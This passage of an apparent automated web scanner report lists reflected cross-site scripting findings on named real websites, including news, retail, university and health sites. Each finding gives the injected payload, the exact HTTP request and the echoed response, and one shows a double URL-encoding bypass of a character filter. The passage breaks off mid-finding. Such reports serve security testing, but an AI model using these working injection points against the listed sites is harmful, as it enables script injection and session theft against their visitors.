The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 42eb8"><script>alert(1)</script>c27d8eead00 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 42eb8\"><script>alert(1)</script>c27d8eead00 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?42eb8"><script>alert(1)</script>c27d8eead00=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.musicloversgroup.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 23:27:33 GMT
Server: Apache
X-Pingback: http://www.musicloversgroup.com/xmlrpc.php
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 25259

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/x
...[SNIP]...
<a href="http://www.musicloversgroup.com/page/2/?42eb8\"><script>alert(1)</script>c27d8eead00=1" title="2 ">
...[SNIP]...

2.40. http://www.networkworld.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.networkworld.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9e505'-alert(1)-'f0b10da86c2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?9e505'-alert(1)-'f0b10da86c2=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.networkworld.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
Cneonction: close
Content-Type: text/html; charset=UTF-8
Expires: Sat, 02 Apr 2011 15:58:51 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 02 Apr 2011 15:58:51 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 210875

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
gtype: 'homepage',
           subtopic: '',
           freemium: 'n',
           nsdr_auth: 'no',
subtopicid: 0,
outerref: '(none)',
nwchannel: 'Network World',
request_uri: '/?9e505'-alert(1)-'f0b10da86c2=1',
doc_uri: '/index.html',
site: 'home',
rxid: '75931',
nodeid: ''    
};
}();
var jq_nodeid = "";
var jq_request_uri = "/?9e505'-alert(1)-'f0
...[SNIP]...

2.41. http://www.newhomesource.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.newhomesource.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5c58d"><script>alert(1)</script>f0bcbad861f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?5c58d"><script>alert(1)</script>f0bcbad861f=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.newhomesource.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 38997
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: UrlRewriter.NET 2.0.0
Set-Cookie: PageCount=2; path=/
Set-Cookie: wtfrompage=; expires=Fri, 01-Apr-2011 15:43:09 GMT; path=/
Set-Cookie: showedRecentItems=0; path=/
Set-Cookie: Personal1=; expires=Mon, 02-Apr-2012 15:43:09 GMT; path=/
Date: Sat, 02 Apr 2011 15:43:09 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-us" lang=
...[SNIP]...
n/popupwindow-false" onclick="AjaxForm.ShowWindow(event,'/LoginModal/popupwindow-true', 400, 320, '', true, function(){SdcAjaxLog('/NewHomeSource/LoginModal','http://www.newhomesource.com/Default.aspx?5c58d"><script>alert(1)</script>f0bcbad861f=1','/NewHomeSource/LoginModal/popupwindow-true','PPWINSHOW',1)}, function(){SdcAjaxLog('/NewHomeSource/LoginModal','http://www.newhomesource.com/Default.aspx?5c58d">
...[SNIP]...

2.42. http://www.onlyteensvids.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.onlyteensvids.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 14fcc"-alert(1)-"34a2a57f157 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?14fcc"-alert(1)-"34a2a57f157=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.onlyteensvids.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 15:20:43 GMT
Server: Apache/2.2.14 (Unix) PHP/5.2.12
X-Powered-By: PHP/5.2.12
Content-Type: text/html
Content-Length: 74590

<script language=JavaScript>
<!--
document.cookie = "stvisitor=noref|1|14fcc"-alert(1)-"34a2a57f157=1; path=/;"
// -->
</script><script type="text/javascript" language="JavaScript"><!--
document.cook
...[SNIP]...

2.43. http://www.overthumbs.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overthumbs.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7187b"><script>alert(1)</script>92b484c0150 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?7187b"><script>alert(1)</script>92b484c0150=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.overthumbs.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sat, 02 Apr 2011 15:57:43 GMT
Content-Type: text/html
Connection: keep-alive
Keep-Alive: timeout=30
Vary: Accept-Encoding
Content-Length: 115425

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascript" langu
...[SNIP]...
<a href="/?7187b"><script>alert(1)</script>92b484c0150=2/">
...[SNIP]...

2.44. http://www.pnwlocalnews.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pnwlocalnews.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c2dcd"><script>alert(1)</script>b28e226b8a0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?c2dcd"><script>alert(1)</script>b28e226b8a0=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.pnwlocalnews.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache
X-Server-Name: dv-c1-r2-u24-b5
Content-Type: text/html;charset=utf-8
Date: Sat, 02 Apr 2011 16:12:40 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: click_mobile=0
Content-Length: 113109


                           <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


                                                                                                                                       
...[SNIP]...
<a href="/contact_us?c=y&curSection=&returnPath=/?c2dcd"><script>alert(1)</script>b28e226b8a0=1">
...[SNIP]...

2.45. http://www.pointstreak.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pointstreak.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ae46c"><script>alert(1)</script>ffbc06d52b0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?ae46c"><script>alert(1)</script>ffbc06d52b0=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.pointstreak.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache/1.3.41 (Unix) mod_gzip/1.3.26.1a PHP/5.2.11
X-Powered-By: PHP/5.2.11
P3P: CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa HISa OUR BUS IND PHY UNI COM NAV INT"
Expires: Sat, 02-Apr-11 15:43:26 GMT
Last-Modified: Sat, 02 Apr 2011 15:41:26 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 63634
be: hockey
vclhockey: 1
Date: Sat, 02 Apr 2011 15:41:28 GMT
X-Varnish: 3922358727
Age: 0
Via: 1.1 varnish
Connection: keep-alive


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
   <meta http-equiv
...[SNIP]...
<meta property="og:url" content="http://www.pointstreak.com/?ae46c"><script>alert(1)</script>ffbc06d52b0=1"/>
...[SNIP]...

2.46. http://www.puma.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.puma.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 93193"><script>alert(1)</script>fc4cc35bcda was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?93193"><script>alert(1)</script>fc4cc35bcda=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.puma.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server/6.1.0.31 Apache/2.0.47
Content-Language: en-US
Cache-Control: max-age=86400
Expires: Sun, 03 Apr 2011 15:07:01 GMT
Content-Type: text/html;charset=utf-8
Date: Sat, 02 Apr 2011 15:07:01 GMT
Content-Length: 24683
Connection: close
Set-Cookie: language=en; Expires=Fri, 02-Apr-2021 01:14:41 GMT; Path=/
Set-Cookie: country=US; Expires=Fri, 02-Apr-2021 01:14:41 GMT; Path=/



...[SNIP]...
<a href="?language=en&93193"><script>alert(1)</script>fc4cc35bcda=1">
...[SNIP]...

2.47. http://www.rd.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.rd.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6a12c</script><script>alert(1)</script>5b92e3406d0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?6a12c</script><script>alert(1)</script>5b92e3406d0=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.rd.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
X-Pingback: http://www.rd.com/xmlrpc.php
Cache-Control: s-maxage=900
Expires: Wed, 23 Mar 2011 02:43:50 GMT
Cache-Control: max-age=900
Content-Type: text/html; charset=UTF-8
Content-Length: 37220
Date: Sat, 02 Apr 2011 15:17:22 GMT
X-Varnish: 745679726
Age: 0
Via: 1.1 varnish
Connection: keep-alive


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html dir="ltr" lang="en-US">
<head>
<meta http-equiv="Content-Type" cont
...[SNIP]...
<!--

s.pageName="RD: Home Page";
s.server="app2.rd.com/10.100.106.107";
s.channel="RD";
s.pageType="";
s.prop1="http://www.rd.com/?6a12c</script><script>alert(1)</script>5b92e3406d0=1";
s.prop2="Home Page";
s.prop3="";
s.prop4="";
s.prop5="";
s.prop6="";
s.prop7="";
s.prop8=s.getFlash('s_fv');
s.prop9="";
s.prop10="";
s.prop11="";
s.prop12=s.getQueryParam('epid');
s.prop13="";
s.
...[SNIP]...

2.48. http://www.recipelion.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.recipelion.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f9a01"><script>alert(1)</script>95cb7b9b1ad was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?f9a01"><script>alert(1)</script>95cb7b9b1ad=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.recipelion.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 15:56:19 GMT
Server: Apache/2.2.9 (Ubuntu) PHP/5.2.11 mod_ssl/2.2.9 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.11
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 87938

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

   
   <meta http-equiv="Content-Type" content="text/html; cha
...[SNIP]...
<a href="" class="lastLink" onclick="return bookmark('http://www.recipelion.com/?f9a01"><script>alert(1)</script>95cb7b9b1ad=1','');">
...[SNIP]...

2.49. http://www.rheumatologychannel.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.rheumatologychannel.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dcaac'-alert(1)-'588c71dd588 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?dcaac'-alert(1)-'588c71dd588=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.rheumatologychannel.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 15:14:10 GMT
Server: Apache
Set-Cookie: HEALTHSESS=7odm2ke8c8lhobrukkolig5vi3; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 43531

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>

<head>
<title>Your Rheumatology Community - Rheumatology Channel</title>
<meta name="DESCRIPTION
...[SNIP]...
<scr'+'ipt src="http://ad.doubleclick.net/adj/site284.tmus/rheumatology;cond=;cond=?dcaac'-alert(1)-'588c71dd588=1;pos=1;' + dcopt + ';tile=' + tile + ';sz=728x90;ord=' + cachebuster + '?">
...[SNIP]...

2.50. http://www.rheumatologychannel.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.rheumatologychannel.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 60e76"><a>c99028ccb1d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /?60e76"><a>c99028ccb1d=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.rheumatologychannel.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 15:14:05 GMT
Server: Apache
Set-Cookie: HEALTHSESS=7odm2ke8c8lhobrukkolig5vi3; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 43405

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>

<head>
<title>Your Rheumatology Community - Rheumatology Channel</title>
<meta name="DESCRIPTION
...[SNIP]...
<a href="http://ad.doubleclick.net/jump/site284.tmus/rheumatology;cond=;cond=?60e76"><a>c99028ccb1d=1;pos=1;sz=728x90;ord=123456789?" target="_blank" >
...[SNIP]...

2.51. http://www.securelinkcorp.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.securelinkcorp.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 3b91b<script>alert(1)</script>5ac33727974 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?3b91b<script>alert(1)</script>5ac33727974=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.securelinkcorp.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 15:56:01 GMT
Server: Apache
Content-Length: 834
Vary: Accept-Encoding,User-Agent
Content-Type: text/html

<html>
<head>
<title>Test JSP page</title>
</head>
<body bgcolor=white>
<table border="0">
<tr>
<td>
<h1>Sample Application JSP Page</h1>
This is the output of a JSP page that is part of the
...[SNIP]...
<td align="left">3b91b<script>alert(1)</script>5ac33727974=1</td>
...[SNIP]...

2.52. http://www.selectsips.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.selectsips.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d948a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ecec1537ff92 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d948a"><script>alert(1)</script>cec1537ff92 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Request

GET /?d948a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ecec1537ff92=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.selectsips.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 15:26:44 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0d DAV/2 PHP/5.2.17
X-Powered-By: PHP/5.2.17
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 02 Apr 2011 15:26:44 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 10116


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<head>
<me
...[SNIP]...
<a href="https://www.selectsips.com/?d948a"><script>alert(1)</script>cec1537ff92=1&login=true">
...[SNIP]...

2.53. http://www.slack-time.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.slack-time.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e8035"-alert(1)-"041f347b4e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?e8035"-alert(1)-"041f347b4e=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.slack-time.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 15:51:13 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 30486

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/2000/REC-xhtml1-20000126/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" la
...[SNIP]...
<script type="text/javascript">
// Note: it's important to keep these in separate script blocks
COMSCORE.beacon({
   c1: 2,
   c2: "6772046",
   c3: "",
   c4: "http://www.slack-time.com/?e8035"-alert(1)-"041f347b4e=1", // Replace this with the page URL that the site is on here, and also enter it into the <noscript>
...[SNIP]...

2.54. http://www.slack-time.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.slack-time.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 10219"><script>alert(1)</script>67eb9ac865a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?10219"><script>alert(1)</script>67eb9ac865a=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.slack-time.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 15:51:13 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 30518

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/2000/REC-xhtml1-20000126/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" la
...[SNIP]...
<img src="http://b.scorecardresearch.com/p?c1=2&c2=6772046&c3=&c4=http://www.slack-time.com/?10219"><script>alert(1)</script>67eb9ac865a=1&c5=&c6=&c15=&cj=1" />
...[SNIP]...

2.55. http://www.spamfighter.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.spamfighter.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e7e39"><script>alert(1)</script>a2971b9f62f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?e7e39"><script>alert(1)</script>a2971b9f62f=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.spamfighter.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Language: en
Content-Length: 37641
Content-Type: text/html
debugtwotreegeo: US
debugtwotreexff: 173.193.214.243
debugsftfromtreeone: vhigh
debugsfcfromtreeone: US
Date: Sat, 02 Apr 2011 15:58:20 GMT
Connection: close
sft: vhigh
sfc: US
Cache-Control: Public
Expires: Sat, 02 Apr 2011 16:00:00 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>

<meta http-e
...[SNIP]...
<a href="/?e7e39"><script>alert(1)</script>a2971b9f62f=1" hreflang="en">
...[SNIP]...

2.56. http://www.suny.edu/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.suny.edu
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9e937"><script>alert(1)</script>a1544f91b96 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?9e937"><script>alert(1)</script>a1544f91b96=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.suny.edu
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 02 Apr 2011 16:10:24 GMT
Server: Microsoft-IIS/6.0
IISExport: This web site was exported using IIS Export v4.2
IISExport: This web site was exported using IIS Export v4.2
IISExport: This web site was exported using IIS Export v4.2
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" lang="en-US">
<head>
<meta
...[SNIP]...
<a
   href="/templates/suny/socialMediaHub.cfm?service=facebook&share=n&link=http://www.suny.edu/home.cfm?9e937"><script>alert(1)</script>a1544f91b96=1" target="socMedia">
...[SNIP]...

2.57. http://www.teenspot.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.teenspot.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 22954"><script>alert(1)</script>c68812124b4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?22954"><script>alert(1)</script>c68812124b4=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.teenspot.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 15:35:14 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 54719

<HTML><HEAD>
<TITLE>TeenSpot.com - offers teen chat rooms, message boards, profiles, music, movies, and blogs.</TITLE>
<META name="description" content="Offers teen chat rooms, message boards, p
...[SNIP]...
<a href="http://www.teenspot.com/?22954"><script>alert(1)</script>c68812124b4=1&amp;vo=6" target="_self">
...[SNIP]...

2.58. http://www.teleprofitsnow.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
